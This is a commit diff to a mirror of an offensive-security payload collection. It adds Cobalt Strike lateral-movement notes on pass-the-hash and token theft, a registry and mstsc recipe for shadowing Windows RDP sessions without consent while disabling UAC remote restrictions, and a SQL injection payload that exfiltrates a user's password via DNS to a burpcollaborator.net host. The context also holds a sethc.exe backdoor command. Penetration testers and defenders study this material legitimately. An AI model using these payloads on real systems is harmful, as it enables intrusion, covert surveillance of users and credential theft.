mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 07:04:22 +00:00
Remote Desktop Services Shadowing
This commit is contained in:
parent
4fe1d71ad8
commit
1137bfca8d
3 changed files with 54 additions and 3 deletions
|
@ -313,6 +313,19 @@ beacon > execute-assembly /home/audit/Rubeus.exe
|
|||
|
||||
## Lateral Movement
|
||||
|
||||
- **portscan:** Performs a portscan on a spesific target.
|
||||
- **runas:** A wrapper of runas.exe, using credentials you can run a command as another user.
|
||||
- **pth:** By providing a username and a NTLM hash you can perform a Pass The Hash attack and inject a TGT on the current process. \
|
||||
:exclamation: This module needs Administrator privileges.
|
||||
- **steal_token:** Steal a token from a specified process.
|
||||
- **make_token:** By providing credentials you can create an impersonation token into the current process and execute commands from the context of the impersonated user.
|
||||
- **jump:** Provides easy and quick way to move lateraly using winrm or psexec to spawn a new beacon session on a target. \
|
||||
:exclamation: The **jump** module will use the current delegation/impersonation token to authenticate on the remote target. \
|
||||
:muscle: We can combine the **jump** module with the **make_token** or **pth** module for a quick "jump" to another target on the network.
|
||||
- **remote-exec:** Execute a command on a remote target using psexec, winrm or wmi. \
|
||||
:exclamation: The **remote-exec** module will use the current delegation/impersonation token to authenticate on the remote target.
|
||||
- **ssh/ssh-key:** Authenticate using ssh with password or private key. Works for both linux and windows hosts.
|
||||
|
||||
:warning: All the commands launch powershell.exe
|
||||
|
||||
```powershell
|
||||
|
|
|
@ -25,6 +25,7 @@
|
|||
* [RDP Backdoor](#rdp-backdoor)
|
||||
* [utilman.exe](#utilman.exe)
|
||||
* [sethc.exe](#sethc.exe)
|
||||
* [Remote Desktop Services Shadowing](#remote-desktop-services-shadowing)
|
||||
* [Skeleton Key](#skeleton-key)
|
||||
* [References](#references)
|
||||
|
||||
|
@ -314,6 +315,31 @@ Hit F5 a bunch of times when you are at the RDP login screen.
|
|||
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
|
||||
```
|
||||
|
||||
### Remote Desktop Services Shadowing
|
||||
|
||||
:warning: FreeRDP and rdesktop don't support Remote Desktop Services Shadowing feature.
|
||||
|
||||
Requirements:
|
||||
* RDP must be running
|
||||
|
||||
```powershell
|
||||
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v Shadow /t REG_DWORD /d 4
|
||||
# 4 – View Session without user’s permission.
|
||||
|
||||
# Allowing remote connections to this computer
|
||||
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
|
||||
|
||||
|
||||
# Disable UAC remote restriction
|
||||
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
|
||||
|
||||
mstsc /v:{ADDRESS} /shadow:{SESSION_ID} /noconsentprompt /prompt
|
||||
# /v parameter lets specify the {ADDRESS} value that is an IP address or a hostname of a remote host;
|
||||
# /shadow parameter is used to specify the {SESSION_ID} value that is a shadowee’s session ID;
|
||||
# /noconsentprompt parameter allows to bypass a shadowee’s permission and shadow their session without their consent;
|
||||
# /prompt parameter is used to specify a user’s credentials to connect to a remote host.
|
||||
```
|
||||
|
||||
### Skeleton Key
|
||||
|
||||
```powershell
|
||||
|
|
|
@ -15,7 +15,9 @@
|
|||
* [MSSQL Time Based](#mssql-time-based)
|
||||
* [MSSQL Stacked query](#mssql-stacked-query)
|
||||
* [MSSQL Command execution](#mssql-command-execution)
|
||||
* [MSSQL UNC path](#mssql-unc-path)
|
||||
* [MSSQL Out of band](#mssql-out-of-band)
|
||||
* [MSSQL DNS exfiltration](#mssql-dns-exfiltration)
|
||||
* [MSSQL UNC path](#mssql-unc-path)
|
||||
* [MSSQL Make user DBA](#mssql-make-user-dba-db-admin)
|
||||
* [MSSQL Trusted Links](#mssql-trusted-links)
|
||||
|
||||
|
@ -134,7 +136,7 @@ ProductID=1';waitfor delay '0:0:10'--
|
|||
ProductID=1');waitfor delay '0:0:10'--
|
||||
ProductID=1));waitfor delay '0:0:10'--
|
||||
|
||||
IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' comment: --
|
||||
IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' comment: --
|
||||
```
|
||||
|
||||
## MSSQL Stacked Query
|
||||
|
@ -187,8 +189,18 @@ print(sys.version)
|
|||
GO
|
||||
```
|
||||
|
||||
## MSSQL Out of band
|
||||
|
||||
## MSSQL UNC Path
|
||||
### MSSQL DNS exfiltration
|
||||
|
||||
Technique from https://twitter.com/ptswarm/status/1313476695295512578/photo/1
|
||||
|
||||
```powershell
|
||||
1 and exists(select * from fn_trace_gettable('\\'%2b(select pass frop users where id=1)%2b'.xxxxxxx.burpcollaborator.net\1.trc',default))
|
||||
```
|
||||
|
||||
|
||||
### MSSQL UNC Path
|
||||
|
||||
MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash.
|
||||
|
||||
|
|
Loading…
Reference in a new issue